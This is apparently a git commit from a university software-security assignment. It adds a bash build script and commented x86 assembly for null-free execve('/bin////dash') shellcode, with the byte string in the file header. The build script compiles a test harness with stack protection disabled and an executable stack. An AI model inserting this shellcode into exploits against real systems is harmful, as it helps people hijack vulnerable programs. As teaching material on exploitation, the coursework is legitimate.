[Assignment-5] added solution task 3 (shellcode)
This commit is contained in:
Sascha Tommasone
parent
055c31519e
commit
6648789260
GPG key ID:
751068A86FCAA217
2 changed files with 37 additions and 5 deletions
16
Assignment 5 - Software Security - Teil 1/shellcode/exploit
Executable file
16
Assignment 5 - Software Security - Teil 1/shellcode/exploit
Executable file
|
|
@ -0,0 +1,16 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# assemble shellcode
|
||||||
|
nasm -felf32 shellcode.asm -o x.o && ld -m elf_i386 x.o -o shellcode &> /dev/null
|
||||||
|
|
||||||
|
# remove object file
|
||||||
|
rm x.o
|
||||||
|
|
||||||
|
# extract shellcode and remove binary
|
||||||
|
shellcode=$(for byte in $(objdump -d ./shellcode | grep "^ " | cut -f2); do echo -n '\x'$byte; done)
|
||||||
|
rm shellcode
|
||||||
|
|
||||||
|
# TODO place shellcode into test_shellcode.c and shellcode.asm
|
||||||
|
|
||||||
|
# compile test_shellcode.c and execute it afterwards
|
||||||
|
gcc -o test_shellcode -m32 -fno-stack-protector -fno-pie -z execstack -O0 test_shellcode.c && ./test_shellcode
|
||||||
|
|
@ -1,8 +1,24 @@
|
||||||
|
|
||||||
; SHELLCODE: "\x90\x90\x90..."
|
; SHELLCODE: "\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
|
||||||
|
|
||||||
global _start
|
section .text
|
||||||
|
global _start
|
||||||
|
|
||||||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||||
|
; https://rayoflightz.github.io/shellcoding/linux/x86/2018/11/15/Shellcoding-for-linux-on-x86.html ;
|
||||||
|
; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit ;
|
||||||
|
; https://man7.org/linux/man-pages/man2/execve.2.html ;
|
||||||
|
; https://www.ascii-code.com/ ;
|
||||||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||||
_start:
|
_start:
|
||||||
;----------------------------------
|
xor eax, eax ; set eax to NULL without terminating the shellcode later
|
||||||
nop; <YOUR CODE HERE>
|
push eax ; push a null byte onto the stack as the string terminator
|
||||||
; ------------ End of file ------------
|
push 0x68736164 ; push the ASCII values for 'dash' onto the stack in reverse order (due to little endian)
|
||||||
|
push 0x2f2f2f2f ; push the ASCII values for '////' onto the stack in reverse order "
|
||||||
|
push 0x6e69622f ; push the ASCII values for '/bin' onto the stack in reverse order "
|
||||||
|
mov ebx, esp ; set ebx to the address of the '/bin////dash' string (top of the stack)
|
||||||
|
mov ecx, eax ; set ecx to NULL (=> char *const _Nullable argv[] is NULL)
|
||||||
|
mov edx, eax ; set edx to NULL (=> char *const _Nullable envp[] is NULL)
|
||||||
|
mov al, 0xb ; load the syscall number for execve (11) into lowest 8 bits of eax to prevent null bytes in shellcode
|
||||||
|
int 0x80 ; trigger the kernel interrupt to execute the syscall
|
||||||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue